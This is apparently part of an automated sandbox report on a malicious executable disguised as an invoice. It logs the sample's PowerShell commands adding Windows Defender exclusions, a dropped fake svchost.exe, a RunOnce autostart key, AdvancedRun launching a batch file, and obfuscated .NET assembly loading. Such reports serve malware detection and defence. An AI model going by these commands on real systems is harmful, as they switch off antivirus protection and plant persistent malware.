        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /SpecialRun 4101d8 5008
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2180
        Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: CN-Invoice-XXXXX9808-19011143287994.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: CN-Invoice-XXXXX9808-19011143287994.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: version.pdb/ source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ml.ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: dhcpcsvc6.pdbo source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: nsi.pdbX source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdb) source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: Accessibility.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rawing.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: winhttp.pdb\ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdbw source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdbk source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: CN-Invoice-XXXXX9808-19011143287994.PDB source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: mscorlib.ni.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: shcore.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: fltLib.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: edputil.pdb! source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: winnsi.pdb[ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: shell32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.ni.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: propsys.pdb9 source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rsaenh.pdbO source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wmswsock.pdbG source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: diasymreader.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: winhttp.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: rtutils.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, AdvancedRun.exe, 00000003.00000000.674869735.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: WLDP.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: sechost.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Drawing.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: clrjit.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdbI source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc.pdbi source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rasman.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: propsys.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: version.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wintrust.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.pdb source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdbm source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rtutils.pdbs source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: npNiVisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: System.Configuration.ni.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: cfgmgr32.pdbE source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: cldapi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000011.00000003.733692999.00000000029E6000.00000004.00000001.sdmp
        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: System.Drawing.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: combase.pdbk source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: System.Core.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: System.Windows.Forms.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdb source: WerFault.exe, 00000011.00000003.772873228.0000000004B08000.00000004.00000001.sdmp
        Source: Binary string: ws2_32.pdbA source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: edputil.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp

        Data Obfuscation:

        .NET source code contains potential unpacker
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Binary contains a suspicious time stamp
        Source: initial sample Static PE information: 0xE5412A60 [Sun Nov 18 19:39:12 2091 UTC]
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe Code function: 3_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_0040289F
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Code function: 0_2_08A27150 pushfd ; ret 0_2_08A27151
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe Code function: 3_2_0040B550 push eax; ret 3_2_0040B564
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe Code function: 3_2_0040B550 push eax; ret 3_2_0040B58C
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe Code function: 3_2_0040B50D push ecx; ret 3_2_0040B51D
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe Code function: 4_2_0040B550 push eax; ret 4_2_0040B564
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe Code function: 4_2_0040B550 push eax; ret 4_2_0040B58C
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe Code function: 4_2_0040B50D push ecx; ret 4_2_0040B51D
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_033CF580 pushad ; ret 5_2_033CF599
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_03464280 pushad ; ret 5_2_03464294
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0346D7B1 push 000000C3h; ret 5_2_0346D7E8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0346D6F0 push 000000C3h; ret 5_2_0346D728
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04E0F0D4 push 850FD83Bh; ret 5_2_04E0F0D9
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Code function: 12_2_06C257F0 pushfd ; ret 12_2_06C257F1
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Code function: 19_2_00AC57F0 pushfd ; ret 19_2_00AC57F1
        Source: 19.0.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.csHigh entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: 19.0.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.csHigh entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: 19.0.svchost.exe.a0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.csHigh entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'

        Persistence and Installation Behavior:

        Drops PE files with benign system names
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe, File created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
        Drops executables to the windows directory (C:\Windows) and starts them
        Source: C:\Windows\explorer.exe, Executable created and started: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe, File created: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe, File created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, File created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe, File created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe

        Boot Survival:

        Creates an autostart registry key pointing to binary in C:\Windows
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe, Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CecuQrfmvIJuvYmbY
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe, Code function: 3_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe, Code function: 3_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe, Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe, Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4778
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1763
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4493
